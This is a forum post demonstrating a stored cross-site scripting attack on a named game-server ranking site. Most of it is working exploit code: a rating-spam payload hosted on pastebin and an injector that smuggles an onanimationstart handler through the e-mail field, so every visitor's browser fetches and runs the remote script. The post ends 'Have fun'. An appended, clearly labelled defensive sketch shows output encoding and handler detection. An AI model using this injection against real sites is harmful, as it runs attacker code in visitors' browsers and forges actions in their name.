Showing results for tags 'security' in content posted in General.



Found 1 result

  1. Hi,

     Here is a small example of a code injection on the top list: metin2pserver.info.

     If you want to test it yourself: I hosted the following script here ( https://pastebin.com/raw/28VjB803 ):

     ```javascript
     /**
      * Rate.
      *
      * @param {string} serverId
      * @param {string} name
      * @param {string} email
      * @param {number} rating
      * @option 1 - Insufficient
      * @option 2 - Inadequate
      * @option 3 - Sufficient
      * @option 4 - Satisfying
      * @option 5 - Good
      * @option 6 - Very good
      * @param {string} comment
      * @param {number} picture
      * @option 1 - Warrior (m)
      * @option 2 - Warrior (f)
      * @option 3 - Ninja (m)
      * @option 4 - Ninja (f)
      * @option 5 - Sura (m)
      * @option 6 - Sura (f)
      * @option 7 - Shaman (m)
      * @option 8 - Shaman (f)
      */
     function rate(serverId, name, email, rating, comment, picture = 1) {
       const root = document.documentElement;
       const iframe = document.createElement('iframe');

       iframe.style.setProperty('display', 'none');
       iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;

       return new Promise((resolve) => {
         iframe.onload = () => {
           const [s] = iframe.contentDocument.getElementsByName('s');
           const token = s && s.value;

           root.removeChild(iframe);

           const data = {
             Name: name,
             Email: email,
             Rating: rating,
             Comments: comment,
             pic: picture,
             id: serverId,
             s: token,
           };

           const params = [];

           for (const param in data) {
             const value = data[param];
             params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
           }

           const body = params.join('&');

           if (token) {
             fetch(iframe.src, {
               method: 'POST',
               headers: {
                 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
               },
               body,
             })
               .then(() => resolve(true))
               .catch(() => resolve(false));
           } else {
             resolve(false);
           }
         };

         root.appendChild(iframe);
       });
     }

     if (location.hash === '#methowashere') {
       const serverId = /server-(.*?).html/.exec(location.href)[1];
       const name = prompt('Your name');
       const comment = prompt('Your comment');

       rate(serverId, name, '', 1, comment);
     }
     ```

     To inject it, go to a server page (e.g.: https://www.metin2pserver.info/server-mt2aom2.html).

     Launch this script on the page:

     ```javascript
     /**
      * Rate.
      *
      * @param {string} serverId
      * @param {string} name
      * @param {string} email
      * @param {number} rating
      * @option 1 - Insufficient
      * @option 2 - Inadequate
      * @option 3 - Sufficient
      * @option 4 - Satisfying
      * @option 5 - Good
      * @option 6 - Very good
      * @param {string} comment
      * @param {number} picture
      * @option 1 - Warrior (m)
      * @option 2 - Warrior (f)
      * @option 3 - Ninja (m)
      * @option 4 - Ninja (f)
      * @option 5 - Sura (m)
      * @option 6 - Sura (f)
      * @option 7 - Shaman (m)
      * @option 8 - Shaman (f)
      */
     function rate(serverId, name, email, rating, comment, picture = 1) {
       const root = document.documentElement;
       const iframe = document.createElement('iframe');

       iframe.style.setProperty('display', 'none');
       iframe.src = `https://www.metin2pserver.info/rate.php?id=${serverId}`;

       return new Promise((resolve) => {
         iframe.onload = () => {
           const [s] = iframe.contentDocument.getElementsByName('s');
           const token = s && s.value;

           root.removeChild(iframe);

           const data = {
             Name: name,
             Email: email,
             Rating: rating,
             Comments: comment,
             pic: picture,
             id: serverId,
             s: token,
           };

           const params = [];

           for (const param in data) {
             const value = data[param];
             params.push(encodeURIComponent(param) + '=' + encodeURIComponent(value));
           }

           const body = params.join('&');

           if (token) {
             fetch(iframe.src, {
               method: 'POST',
               headers: {
                 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
               },
               body,
             })
               .then(() => resolve(true))
               .catch(() => resolve(false));
           } else {
             resolve(false);
           }
         };

         root.appendChild(iframe);
       });
     }

     /**
      * Inject.
      *
      * @param {string} script
      * @param {string} name
      */
     function injectScript(script, name = 'Dummy') {
       const serverId = /server-(.*?).html/.exec(location.href)[1];
       const code = `$.getScript('${script}')`;
       const injection = `"style="animation:fb_transform"onanimationstart="${code}"`;

       console.log(`Server: ${serverId}`);
       console.log(`Name: ${name}`);
       console.log(`Script: ${script}`);
       console.log(`Injections: ${injection}`);

       return rate(serverId, name, injection, 1, '[...]');
     }
     ```

     You can then inject it like this:

     ```javascript
     injectScript('https://pastebin.com/raw/28VjB803').then((r) => console.log('Result: ', r));
     ```

     You can then test it like this: https://www.metin2pserver.info/server-UGMT2.html#mailsywashere

     Have fun
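
Added example, not part of the original post or the site's code: the injection string above is submitted as the e-mail field and opens with a double quote, which implies (an assumption, since the post does not show the server side) that the field is written into a double-quoted HTML attribute without encoding. The sketch below puts that unencoded rendering beside an encoded one and uses a small attribute scanner to show the difference; all function names and the `<a>` markup are hypothetical.

```javascript
// Added example; every name and the <a> markup are hypothetical.
// Assumption: the e-mail field is echoed into a double-quoted attribute.

// Constructed sample with the same shape as the post's injection string;
// the handler body is an inert placeholder.
const SAMPLE = '"style="animation:fb_transform"onanimationstart="noop()"';

// Encode the characters that can terminate or reshape an attribute value.
function escapeAttr(value) {
  const map = { '&': '&amp;', '"': '&quot;', "'": '&#39;', '<': '&lt;', '>': '&gt;' };
  return String(value).replace(/[&"'<>]/g, (c) => map[c]);
}

// 'Before': raw concatenation, so a quote in the value ends the attribute.
function renderAuthorUnsafe(email) {
  return `<a class="author" href="mailto:${email}">contact</a>`;
}

// 'After': the value is encoded for the attribute context on output.
function renderAuthor(email) {
  return `<a class="author" href="mailto:${escapeAttr(email)}">contact</a>`;
}

// Input-side check: reject values that cannot be an address at all.
function isPlausibleEmail(value) {
  return /^[^\s@"'<>]+@[^\s@"'<>]+\.[^\s@"'<>]+$/.test(value);
}

// Approximate list of the attribute names present in the rendered markup.
function attributeNames(html) {
  const re = /([^\s"'<>\/=]+)\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+)/g;
  const names = [];
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// True when any attribute is an inline event handler (on*).
function hasEventHandler(html) {
  return attributeNames(html).some((n) => n.startsWith('on'));
}

console.log('unsafe :', attributeNames(renderAuthorUnsafe(SAMPLE)));
console.log('encoded:', attributeNames(renderAuthor(SAMPLE)));
```

Encoding on output is the fix; the input check only narrows what gets stored. A Content-Security-Policy that omits `'unsafe-inline'` additionally stops inline event-handler attributes from running.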